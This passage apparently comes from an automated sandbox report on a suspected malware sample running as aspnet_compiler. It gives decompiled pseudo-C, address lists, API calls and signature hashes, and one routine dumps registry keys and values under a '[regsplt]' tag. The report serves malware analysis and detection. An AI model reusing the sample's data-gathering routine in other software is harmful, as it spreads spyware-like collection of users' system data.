											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t183;
													if( *_t183 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t183 =  *_t183 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t183;
												if( *_t183 <= 0) {
													goto L91;
												}
												_t180 = _v40;
												 *((short*)( *_t180)) =  *_t173;
												 *_t180 =  *_t180 + 2;
												 *_t183 =  *_t183 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t179 =  &(_t179[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t179 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t183;
												if( *_t183 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t179 =  &(_t179[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t183 =  *_t183 - 1;
												_t159 =  *_t179 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E00452294(_t145, _t179, _t183, _t179, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E00452294(_t145, _t179, _t183, _t179, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t179[3]);
											}
										} else {
											_t153 =  &(_t179[5]);
											_v28 =  &(_t179[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L55:
											_push(0x48);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L55;
										}
										goto L108;
									}
									__eflags = _t95 - 0x4d;
									if(_t95 == 0x4d) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L50:
											_push(0x6d);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L50;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x62);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x42);
										goto L111;
									}
									__eflags = _t95 - 0x61;
									if(_t95 != 0x61) {
										goto L108;
									}
									goto L41;
								}
								goto L28;
							}
							_t203 = _v33;
							if(_v33 == 0) {
								_t133 = E004470EB(_t165, _t184, __eflags,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147, 0);
							} else {
								_t133 = E0044722D(_t165, _t184, _t203,  *((intOrPtr*)(_v44 + 0x160)), 0,  &_v24, _t179, _t184, _t147);
							}
							_t181 = _t184;
							_t177 = _t133 - 1;
							if(_t177 <= 0) {
								L27:
								E00434713(_t184);
								goto L28;
							} else {
								_t148 = _v32;
								_t185 = _v40;
								while( *_t148 > 0) {
									_t135 =  *_t181;
									_t181 = _t181 + 2;
									 *( *_t185) = _t135;
									 *_t185 =  &(( *_t185)[0]);
									 *_t148 =  *_t148 - 1;
									_t177 = _t177 - 1;
									if(_t177 > 0) {
										continue;
									}
									break;
								}
								_t184 = _v28;
								goto L27;
							}
						}
						asm("sbb eax, eax");
						_t137 = _t129 & _t175 + 0x00000008;
						_t165 = _t175 + 8;
						if((_t129 & _t175 + 0x00000008) > 0x400) {
							__eflags = _t175 - _t165;
							asm("sbb eax, eax");
							_t186 = E00444A38(_t165, _t137 & _t165);
							_v28 = _t186;
							_pop(_t165);
							__eflags = _t186;
							if(__eflags == 0) {
								goto L30;
							}
							 *_t186 = 0xdddd;
							L14:
							_t184 = _t186 + 8;
							goto L18;
						}
						asm("sbb eax, eax");
						E00455A90();
						_t186 = _t188;
						_v28 = _t186;
						if(_t186 == 0) {
							goto L30;
						}
						 *_t186 = 0xcccc;
						goto L14;
					}
				}
			}
































































                    0x00445df1
                    0x00445df9
                    0x00445e00
                    0x00445e06
                    0x00445e09
                    0x00445e10
                    0x00445e13
                    0x00445e19
                    0x00445e1c
                    0x00445e20
                    0x00445e23
                    0x00445e27
                    0x00445e2a
                    0x00445e41
                    0x00445e2c
                    0x00445e2f
                    0x00445e39
                    0x00445e31
                    0x00445e31
                    0x00445e31
                    0x00445e2f
                    0x00445e4e
                    0x00000000
                    0x00445e54
                    0x00445e5d
                    0x00445e64
                    0x00445e6e
                    0x00445e71
                    0x00445e79
                    0x00445e81
                    0x00445e89
                    0x00445e90
                    0x00445e96
                    0x00445e9d
                    0x00445e9f
                    0x00445eb5
                    0x00445ec3
                    0x00445ea1
                    0x00445eae
                    0x00445eae
                    0x00445ec8
                    0x00445ecc
                    0x00000000
                    0x00445ed2
                    0x00445ed2
                    0x00445ed5
                    0x00445eda
                    0x00445ede
                    0x00445f38
                    0x00445f38
                    0x00445f3a
                    0x00445f3a
                    0x00445f3f
                    0x00445fbf
                    0x00445fc1
                    0x00445fc6
                    0x0044623d
                    0x0044623d
                    0x0044623d
                    0x00446240
                    0x00446243
                    0x00000000
                    0x00000000
                    0x00445fcf
                    0x00445fd2
                    0x00445fa9
                    0x00445fab
                    0x00445fbe
                    0x00445fbe
                    0x00445fd4
                    0x00445fd8
                    0x00445fd8
                    0x00445fda
                    0x00445fdd
                    0x00445fdf
                    0x00445fe2
                    0x00445fe2
                    0x00445fe5
                    0x00445fe6
                    0x00445fe6
                    0x00445feb
                    0x00445fee
                    0x00445ff1
                    0x00445ff4
                    0x00445ff7
                    0x0044612c
                    0x0044612c
                    0x0044612f
                    0x004461fc
                    0x004461fc
                    0x004461ff
                    0x00446218
                    0x0044621c
                    0x0044621c
                    0x0044621e
                    0x0044621e
                    0x0044622b
                    0x0044622e
                    0x00446233
                    0x00446236
                    0x00446238
                    0x00446253
                    0x00000000
                    0x00446259
                    0x0044623a
                    0x0044623a
                    0x00000000
                    0x0044623a
                    0x00446201
                    0x00446201
                    0x00446204
                    0x00000000
                    0x00000000
                    0x00446206
                    0x00446206
                    0x00446209
                    0x0044620e
                    0x00446211
                    0x00446214
                    0x00000000
                    0x00446214
                    0x00446135
                    0x00446135
                    0x00446138
                    0x004461e8
                    0x004461e8
                    0x004461eb
                    0x004461f4
                    0x004461f8
                    0x004461f8
                    0x00000000
                    0x004461f8
                    0x004461ed
                    0x004461ed
                    0x004461f0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004461f2
                    0x0044613e
                    0x0044613e
                    0x00446141
                    0x004461d4
                    0x004461d4
                    0x004461d7
                    0x004461e0
                    0x004461e4
                    0x004461e4
                    0x00000000
                    0x004461e4
                    0x004461d9
                    0x004461d9
                    0x004461dc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004461de
                    0x00446147
                    0x00446147
                    0x0044614a
                    0x00446173
                    0x00446176
                    0x0044617a
                    0x00446184
                    0x0044617c
                    0x0044617c
                    0x0044617c
                    0x0044618a
                    0x0044618d
                    0x004461a9
                    0x004461a9
                    0x004461ac
                    0x004461af
                    0x00000000
                    0x00000000
                    0x004461b5
                    0x004461b8
                    0x004461b8
                    0x004461bb
                    0x00000000
                    0x00000000
                    0x004461bf
                    0x004461c2
                    0x004461c5
                    0x004461c8
                    0x004461ca
                    0x004461cd
                    0x004461d0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004461d2
                    0x0044618f
                    0x0044618f
                    0x00446192
                    0x00000000
                    0x00000000
                    0x00446194
                    0x0044619c
                    0x0044619f
                    0x004461a2
                    0x004461a2
                    0x00000000
                    0x0044618d
                    0x0044614c
                    0x0044614f
                    0x00000000
                    0x00000000
                    0x00446156
                    0x00446156
                    0x00446159
                    0x0044616c
                    0x00000000
                    0x0044616c
                    0x0044615c
                    0x0044615c
                    0x0044615f
                    0x00000000
                    0x00000000
                    0x00446165
                    0x00000000
                    0x00446165
                    0x00445ffd
                    0x004460fb
                    0x004460fb
                    0x004460fe
                    0x00446121
                    0x00446125
                    0x00446125
                    0x00000000
                    0x00446125
                    0x00446100
                    0x00446100
                    0x00446103
                    0x00000000
                    0x00000000
                    0x00446105
                    0x00446105
                    0x00446108
                    0x0044611a
                    0x00000000
                    0x0044611a
                    0x0044610a
                    0x0044610a
                    0x0044610d
                    0x00000000
                    0x00000000
                    0x00446113
                    0x00000000
                    0x00446113
                    0x00446003
                    0x00446006
                    0x004460a8
                    0x004460a8
                    0x004460ad
                    0x004460b3
                    0x004460b3
                    0x004460b4
                    0x004460b7
                    0x004460bd
                    0x004460c0
                    0x004460c3
                    0x00000000
                    0x00000000
                    0x004460c9
                    0x004460cc
                    0x004460cc
                    0x004460cf
                    0x00000000
                    0x00000000
                    0x004460d7
                    0x004460d8
                    0x004460db
                    0x004460de
                    0x00000000
                    0x00000000
                    0x004460e6
                    0x004460e9
                    0x004460ec
                    0x004460ee
                    0x004460f1
                    0x004460f4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004460f6
                    0x004460cc
                    0x00000000
                    0x004460b7
                    0x0044600c
                    0x0044600f
                    0x00446024
                    0x0044602a
                    0x00446031
                    0x00446033
                    0x0044608e
                    0x00446094
                    0x00446095
                    0x00446097
                    0x0044609c
                    0x0044609c
                    0x00446035
                    0x00446035
                    0x00446038
                    0x00446038
                    0x0044609f
                    0x00000000
                    0x0044609f
                    0x00446011
                    0x00446014
                    0x0044606e
                    0x0044606e
                    0x00446071
                    0x0044607d
                    0x00446081
                    0x00446081
                    0x00000000
                    0x00446081
                    0x00446073
                    0x00446073
                    0x00446076
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00446078
                    0x00446016
                    0x00446019
                    0x0044603d
                    0x0044603d
                    0x00446040
                    0x00446063
                    0x00446067
                    0x00446067
                    0x00000000
                    0x00446067
                    0x00446042
                    0x00446042
                    0x00446045
                    0x00000000
                    0x00000000
                    0x00446047
                    0x00446047
                    0x0044604a
                    0x0044605c
                    0x00000000
                    0x0044605c
                    0x0044604c
                    0x0044604c
                    0x0044604f
                    0x00000000
                    0x00000000
                    0x00446055
                    0x00000000
                    0x00446055
                    0x0044601b
                    0x0044601e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044601e
                    0x00000000
                    0x00446249
                    0x00445f41
                    0x00445f48
                    0x00445f71
                    0x00445f4a
                    0x00445f59
                    0x00445f59
                    0x00445f78
                    0x00445f7a
                    0x00445f7d
                    0x00445fa2
                    0x00445fa3
                    0x00000000
                    0x00445f7f
                    0x00445f7f
                    0x00445f82
                    0x00445f85
                    0x00445f8c
                    0x00445f8f
                    0x00445f92
                    0x00445f95
                    0x00445f98
                    0x00445f9a
                    0x00445f9d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00445f9d
                    0x00445f9f
                    0x00000000
                    0x00445f9f
                    0x00445f7d
                    0x00445ee5
                    0x00445ee7
                    0x00445ee9
                    0x00445ef1
                    0x00445f16
                    0x00445f18
                    0x00445f22
                    0x00445f24
                    0x00445f27
                    0x00445f28
                    0x00445f2a
                    0x00000000
                    0x00000000
                    0x00445f30
                    0x00445f11
                    0x00445f11
                    0x00000000
                    0x00445f11
                    0x00445ef5
                    0x00445ef9
                    0x00445efe
                    0x00445f00
                    0x00445f05
                    0x00000000
                    0x00000000
                    0x00445f0b
                    0x00000000
                    0x00445f0b
                    0x00445ecc

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16_free
                    • String ID: a/p$am/pm$hcD
                    • API String ID: 2936374016-190199888
                    • Opcode ID: 5c7e93bfea36d6bfccbfe78ada7fac18a8ac017cf94aac838d0c5b4a5acd0a7e
                    • Instruction ID: 32e67ee006756031a0b78f425dd56af27fcec1da6a44ec8361004faafc6abf4c
                    • Opcode Fuzzy Hash: 5c7e93bfea36d6bfccbfe78ada7fac18a8ac017cf94aac838d0c5b4a5acd0a7e
                    • Instruction Fuzzy Hash: A9D1D231900205ABFB249FA8C955ABBB7B0FF06300F25419BE941AB342D77D9D81CB5B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0044F2A5 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E0044F2A5(void* __edx, char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t53;
				void _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				signed int _t64;
				char _t92;
				char _t100;
				void* _t101;
				signed int _t104;
				void* _t107;
				void* _t121;
				char* _t123;
				signed int _t127;
				intOrPtr* _t132;
				void* _t133;
				intOrPtr* _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t138;
				char* _t139;

				_t121 = __edx;
				_t100 = _a4;
				_v28 = _t100;
				_v24 = 0;
				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
					_v16 = 1;
					_t53 = E004443F4(_t101, 1, 0x50);
					_v8 = _t53;
					if(_t53 != 0) {
						_t104 = 0x14;
						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
						_t132 = E00444A38(0, 4);
						_t127 = 0;
						_v12 = _t132;
						E00445002(0);
						_pop(_t107);
						if(_t132 != 0) {
							 *_t132 = 0;
							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
								_t133 = _v8;
								_t57 =  *0x46f188; // 0x46f180
								 *_t133 = _t57;
								_t58 =  *0x46f18c; // 0x47065c
								 *((intOrPtr*)(_t133 + 4)) = _t58;
								_t59 =  *0x46f190; // 0x47065c
								 *((intOrPtr*)(_t133 + 8)) = _t59;
								_t60 =  *0x46f1b8; // 0x46f184
								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
								_t61 =  *0x46f1bc; // 0x470660
								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
								L19:
								 *_v12 = 1;
								if(_t127 != 0) {
									 *_t127 = 1;
								}
								goto L21;
							}
							_t134 = E00444A38(_t107, 4);
							_v20 = _t134;
							E00445002(0);
							if(_t134 == 0) {
								L11:
								E00445002(_v8);
								E00445002(_v12);
								return _v16;
							}
							 *_t134 = 0;
							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
							_t135 = E004516F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
							_t136 = _t135 | E004516F4(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
							_v16 = _v8 + 8;
							_t137 = _t136 | E004516F4(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
							_t138 = _t137 | E004516F4(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
							if((E004516F4(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
								_t123 =  *_v16;
								while( *_t123 != 0) {
									_t92 =  *_t123;
									if(_t92 < 0x30 || _t92 > 0x39) {
										if(_t92 != 0x3b) {
											goto L16;
										}
										_t139 = _t123;
										do {
											 *_t139 =  *((intOrPtr*)(_t139 + 1));
											_t139 = _t139 + 1;
										} while ( *_t139 != 0);
									} else {
										 *_t123 = _t92 - 0x30;
										L16:
										_t123 = _t123 + 1;
									}
								}
								_t127 = _v20;
								_t133 = _v8;
								goto L19;
							}
							E0044F23C(_v8);
							_v16 = _v16 | 0xffffffff;
							goto L11;
						}
						E00445002(_v8);
						return 1;
					}
					return 1;
				} else {
					_t127 = 0;
					_v12 = 0;
					_t133 = 0x46f188;
					L21:
					_t64 =  *(_t100 + 0x80);
					if(_t64 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t100 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t64 | 0xffffffff) == 0) {
							E00445002( *((intOrPtr*)(_t100 + 0x7c)));
							E00445002( *(_t100 + 0x88));
						}
					}
					 *((intOrPtr*)(_t100 + 0x7c)) = _v12;
					 *(_t100 + 0x80) = _t127;
					 *(_t100 + 0x88) = _t133;
					return 0;
				}
			}



































                    0x0044f2a5
                    0x0044f2ae
                    0x0044f2b5
                    0x0044f2b8
                    0x0044f2c1
                    0x0044f2e0
                    0x0044f2e3
                    0x0044f2e8
                    0x0044f2ef
                    0x0044f302
                    0x0044f303
                    0x0044f30c
                    0x0044f30e
                    0x0044f311
                    0x0044f314
                    0x0044f31a
                    0x0044f31d
                    0x0044f330
                    0x0044f338
                    0x0044f492
                    0x0044f495
                    0x0044f49a
                    0x0044f49c
                    0x0044f4a1
                    0x0044f4a4
                    0x0044f4a9
                    0x0044f4ac
                    0x0044f4b1
                    0x0044f4b4
                    0x0044f4b9
                    0x0044f422
                    0x0044f428
                    0x0044f42c
                    0x0044f42e
                    0x0044f42e
                    0x00000000
                    0x0044f42c
                    0x0044f345
                    0x0044f348
                    0x0044f34b
                    0x0044f354
                    0x0044f3e9
                    0x0044f3ec
                    0x0044f3f5
                    0x00000000
                    0x0044f3fe
                    0x0044f35d
                    0x0044f362
                    0x0044f376
                    0x0044f38a
                    0x0044f396
                    0x0044f3a4
                    0x0044f3be
                    0x0044f3da
                    0x0044f404
                    0x0044f417
                    0x0044f408
                    0x0044f40c
                    0x0044f47f
                    0x00000000
                    0x00000000
                    0x0044f481
                    0x0044f483
                    0x0044f486
                    0x0044f488
                    0x0044f48b
                    0x0044f412
                    0x0044f414
                    0x0044f416
                    0x0044f416
                    0x0044f416
                    0x0044f40c
                    0x0044f41c
                    0x0044f41f
                    0x00000000
                    0x0044f41f
                    0x0044f3df
                    0x0044f3e4
                    0x00000000
                    0x0044f3e8
                    0x0044f322
                    0x00000000
                    0x0044f32a
                    0x00000000
                    0x0044f2cb
                    0x0044f2cb
                    0x0044f2cd
                    0x0044f2d0
                    0x0044f430
                    0x0044f430
                    0x0044f438
                    0x0044f43a
                    0x0044f43a
                    0x0044f442
                    0x0044f447
                    0x0044f44b
                    0x0044f450
                    0x0044f45b
                    0x0044f461
                    0x0044f44b
                    0x0044f465
                    0x0044f46a
                    0x0044f470
                    0x00000000
                    0x0044f470

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: bdae3a8ff5b80d57b785f2781f8bb375039c999b1d8b81c3e14c9f7f4d8bf86a
                    • Instruction ID: 121fa3ad2d8a90f2dd1ed919a7657a0be01bb40abeb4b2edb7d8cd7f10ddde60
                    • Opcode Fuzzy Hash: bdae3a8ff5b80d57b785f2781f8bb375039c999b1d8b81c3e14c9f7f4d8bf86a
                    • Instruction Fuzzy Hash: D8610075900205AFEB20CF69C842B9FBBF4EF15724F14407BE844EB242EB749D468B98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00412D3D Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 89%
                    			E00412D3D(void* __ecx, short* __edx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				struct _FILETIME _v84;
				void* _v95;
				char _v96;
				char _v108;
				char _v132;
				char _v156;
				short _v668;
				short _v1188;
				char _v11188;
				short _v43956;
				void* __ebx;
				void* __edi;
				void* __ebp;
				int _t72;
				long _t73;
				void* _t93;
				long _t103;
				void* _t104;
				void* _t110;
				void* _t140;
				int _t144;
				int _t146;
				void* _t147;
				void* _t148;
				void* _t149;

				_t137 = __edx;
				_t112 = __ecx;
				E00455FB0();
				_push(_t140);
				_t144 = 0;
				_t110 = __ecx;
				E00435760(_t140,  &_v1188, 0, 0x208);
				_t149 = _t148 + 0xc;
				_v24 = 0x104;
				_v8 = 0;
				_v12 = 0x3fff;
				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
				_t72 = _v8;
				if(_t72 != 0 && _t72 != 0) {
					do {
						_v28 = 0xff;
						_t103 = RegEnumKeyExW(_t110, _t144,  &_v668,  &_v28, 0, 0, 0,  &_v84);
						_t152 = _t103;
						if(_t103 == 0) {
							_t104 = E0040415E(_t110,  &_v56, _t137, _t147, "\n");
							_t137 =  &_v668;
							E0040323D(E004042DC(_t110,  &_v108,  &_v668, _t147, _t152, _t104));
							E00401EE9();
							_t112 =  &_v56;
							E00401EE9();
						}
						_t144 = _t144 + 1;
					} while (_t144 < _v8);
				}
				_t73 = _v20;
				if(_t73 != 0) {
					_t146 = 0;
					if(_t73 != 0) {
						do {
							_v96 = 0;
							_v16 = 0x2710;
							asm("stosd");
							_v12 = 0x3fff;
							asm("stosd");
							asm("stosw");
							asm("stosb");
							_v43956 = 0;
							_t73 = RegEnumValueW(_t110, _t146,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
							_t156 = _t73;
							if(_t73 == 0) {
								E00440751(_t112, _v32,  &_v96, 0xa);
								_t149 = _t149 + 0xc;
								E0040323D(E004042DC(_t110,  &_v56,  &_v43956, _t147, _t156, E0040415E(_t110,  &_v132, _t137, _t147, "\n")));
								E00401EE9();
								E00401EE9();
								L00403356(E004052DD(_t110,  &_v132,  &_v96, _t147, _t156, E00402073(_t110,  &_v56,  &_v43956, _t147, "\n")));
								E00401FB8();
								E00401FB8();
								_t93 = E00402073(_t110,  &_v156,  &_v96, _t147, "[regsplt]");
								_t137 = E00402097(_t110,  &_v56,  &_v96, _t147, _t156,  &_v11188, _v16);
								L00403356(E00402E81( &_v132, _t95, _t93));
								E00401FB8();
								E00401FB8();
								_t112 =  &_v156;
								_t73 = E00401FB8();
							}
							_t146 = _t146 + 1;
						} while (_t146 < _v20);
					}
				}
				return _t73;
			}









































                    0x00412d3d
                    0x00412d3d
                    0x00412d45
                    0x00412d4c
                    0x00412d52
                    0x00412d5c
                    0x00412d5e
                    0x00412d63
                    0x00412d66
                    0x00412d70
                    0x00412d73
                    0x00412da4
                    0x00412daa
                    0x00412daf
                    0x00412db5
                    0x00412db8
                    0x00412dd3
                    0x00412dd9
                    0x00412ddb
                    0x00412de5
                    0x00412deb
                    0x00412e00
                    0x00412e08
                    0x00412e0d
                    0x00412e10
                    0x00412e10
                    0x00412e15
                    0x00412e16
                    0x00412db5
                    0x00412e1b
                    0x00412e20
                    0x00412e26
                    0x00412e2a
                    0x00412e30
                    0x00412e32
                    0x00412e39
                    0x00412e40
                    0x00412e41
                    0x00412e48
                    0x00412e49
                    0x00412e4b
                    0x00412e4e
                    0x00412e73
                    0x00412e79
                    0x00412e7b
                    0x00412e8a
                    0x00412e8f
                    0x00412eb5
                    0x00412ebd
                    0x00412ec5
                    0x00412eea
                    0x00412ef2
                    0x00412efa
                    0x00412f0a
                    0x00412f22
                    0x00412f33
                    0x00412f3b
                    0x00412f43
                    0x00412f48
                    0x00412f4e
                    0x00412f4e
                    0x00412f53
                    0x00412f54
                    0x00412e30
                    0x00412e2a
                    0x00412f63

                    APIs
                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00412DA4
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00412DD3
                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00412E73
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Enum$InfoQueryValue
                    • String ID: 4G$84G$[regsplt]
                    • API String ID: 3554306468-2898483682
                    • Opcode ID: af14ab2f211be19c5a0ce6283f8fc8ae5bb93f867747e7838a1519697747fa23
                    • Instruction ID: cf1d04cbe3be26fdb60a522ae5fe91f3eacc00445e23186f7e28dbfa0a80019f
                    • Opcode Fuzzy Hash: af14ab2f211be19c5a0ce6283f8fc8ae5bb93f867747e7838a1519697747fa23
                    • Instruction Fuzzy Hash: FA512B71900219AADB10EB91DD85EEFB7BCAF04304F50017AE505F2191EF74AB49CBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0045551A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E0045551A(signed int __edx, intOrPtr _a4, intOrPtr _a8, char _a12) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				signed int _t17;
				int _t20;
				signed int _t21;
				int _t23;
				signed int _t25;
				int _t28;
				intOrPtr* _t30;
				int _t34;
				int _t35;
				void* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				int _t46;
				void* _t54;
				void* _t56;
				signed int _t58;
				int _t61;
				int _t63;
				void* _t64;
				void* _t65;
				void* _t66;

				_t58 = __edx;
				_t59 = _a4;
				_t61 = 0;
				_t16 = E0044AB6C(_a4, 0, 0, 1);
				_v20 = _t16;
				_v16 = __edx;
				_t65 = _t64 + 0x10;
				if((_t16 & __edx) != 0xffffffff) {
					_t17 = E0044AB6C(_t59, 0, 0, 2);
					_t66 = _t65 + 0x10;
					_t51 = _t17 & __edx;
					__eflags = (_t17 & __edx) - 0xffffffff;
					if((_t17 & __edx) == 0xffffffff) {
						goto L1;
					}
					_t46 = _a8 - _t17;
					__eflags = _t46;
					_t5 =  &_a12; // 0x454445
					_t20 =  *_t5;
					asm("sbb eax, edx");
					_v8 = _t20;
					if(__eflags < 0) {
						L24:
						__eflags = _t20 - _t61;
						if(__eflags > 0) {
							L19:
							_t13 =  &_v20; // 0x454445
							_t21 = E0044AB6C(_t59,  *_t13, _v16, _t61);
							__eflags = (_t21 & _t58) - 0xffffffff;
							if((_t21 & _t58) != 0xffffffff) {
								_t23 = 0;
								__eflags = 0;
								L31:
								return _t23;
							}
							L20:
							_t23 =  *((intOrPtr*)(E0043EEAD()));
							goto L31;
						}
						if(__eflags < 0) {
							L27:
							_t14 =  &_a12; // 0x454445
							_t25 = E0044AB6C(_t59, _a8,  *_t14, _t61);
							_t66 = _t66 + 0x10;
							__eflags = (_t25 & _t58) - 0xffffffff;
							if((_t25 & _t58) == 0xffffffff) {
								goto L20;
							}
							_t28 = SetEndOfFile(E0044ED18(_t59));
							__eflags = _t28;
							if(_t28 != 0) {
								goto L19;
							}
							 *((intOrPtr*)(E0043EEAD())) = 0xd;
							_t30 = E0043EE9A();
							 *_t30 = GetLastError();
							goto L20;
						}
						__eflags = _t46 - _t61;
						if(_t46 >= _t61) {
							goto L19;
						}
						goto L27;
					}
					if(__eflags > 0) {
						L6:
						_t63 = E004443F4(_t51, 0x1000, 1);
						_pop(_t54);
						__eflags = _t63;
						if(_t63 != 0) {
							_v12 = E00442C00(_t54, _t59, 0x8000);
							_t34 = _v8;
							_pop(_t56);
							do {
								__eflags = _t34;
								if(__eflags < 0) {
									L13:
